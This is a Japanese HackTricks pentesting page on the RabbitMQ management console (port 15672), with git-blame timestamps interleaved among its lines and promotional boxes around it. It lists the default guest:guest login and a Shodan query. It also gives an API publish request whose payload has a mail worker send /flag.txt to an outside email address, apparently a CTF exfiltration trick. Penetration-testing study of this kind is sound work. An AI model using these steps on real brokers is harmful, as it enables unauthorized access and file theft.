2024-02-09 12:54:39 +00:00
# 15672 - RabbitMQ管理のペンテスト
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 12:54:39 +00:00
< summary > < strong > htARTE( ) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > でAWSハッキングをゼロからヒーローまで学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
HackTricksをサポートする他の方法:
2024-02-09 12:54:39 +00:00
2024-02-18 14:52:15 +00:00
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASS& ](https://peass.creator-spring.com )を入手する
- [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ ](https://discord.gg/hRep4RUj7f )**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )で**フォロー**する
- **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**する
2022-04-28 16:01:33 +00:00
< / details >
2024-02-18 14:52:15 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-02-18 14:52:15 +00:00
**バグバウンティのヒント**: **ハッカーによって作成されたプレミアムバグバウンティプラットフォーム**である**Intigriti**に**サインアップ**してください!今すぐ[**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks)に参加して、最大**$100,000**のバウンティを獲得し始めましょう!
2022-05-24 00:07:19 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-05-24 00:07:19 +00:00
2023-07-07 23:42:27 +00:00
## 基本情報
2020-07-15 15:43:14 +00:00
2024-02-09 12:54:39 +00:00
RabbitMQについては、[**5671,5672 - AMQPのペンテスト**](5671-5672-pentesting-amqp.md)で詳細を学ぶことができます。\
このポートでは、[管理プラグイン](https://www.rabbitmq.com/management.html)が有効になっている場合、RabbitMQ管理Webコンソールが見つかるかもしれません。\
メインページは次のようになります:
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## 列挙
2020-07-15 15:43:14 +00:00
2024-02-09 12:54:39 +00:00
デフォルトの資格情報は "_**guest**_":"_**guest**_" です。機能しない場合は、[**ログインをブルートフォース**](../generic-methodologies-and-resources/brute-force.md#http-post-form)してみてください。
2020-07-15 15:43:14 +00:00
2023-12-26 02:42:22 +00:00
このモジュールを手動で開始するには、次のコマンドを実行する必要があります:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
```
2024-02-18 14:52:15 +00:00
認証が正しく行われると、管理コンソールが表示されます:
2020-07-15 15:43:14 +00:00
2022-09-30 10:43:59 +00:00
 ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-18 14:52:15 +00:00
また、有効な資格情報を持っている場合は、`http://localhost:15672/api/connections`の情報が興味深いかもしれません。
2020-07-15 15:43:14 +00:00
2024-02-18 14:52:15 +00:00
また、このサービスのAPIを使用して、キュー内にデータを**公開することが可能**で、次のようなリクエストを使用します:
2020-07-15 15:43:14 +00:00
```bash
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```
2022-05-01 13:25:53 +00:00
### Shodan
2020-07-15 15:43:14 +00:00
* `port:15672 http`
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-02-18 14:52:15 +00:00
**バグバウンティのヒント**: **Intigriti**に**サインアップ**してください。これは、ハッカーによって作成されたプレミアムな**バグバウンティプラットフォーム**です で参加し、最大**$100,000**のバウンティを獲得しましょう!
2022-05-24 00:07:19 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-05-24 00:07:19 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-02-18 14:52:15 +00:00
< summary > < strong > **htARTE (HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!< / strong > < / summary >
2024-02-09 12:54:39 +00:00
2024-02-18 14:52:15 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
* **HackTricksで企業を宣伝したい**場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& ](https://peass.creator-spring.com )を入手する
2024-02-18 14:52:15 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )を**フォロー**する
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
2022-04-28 16:01:33 +00:00
< / details >
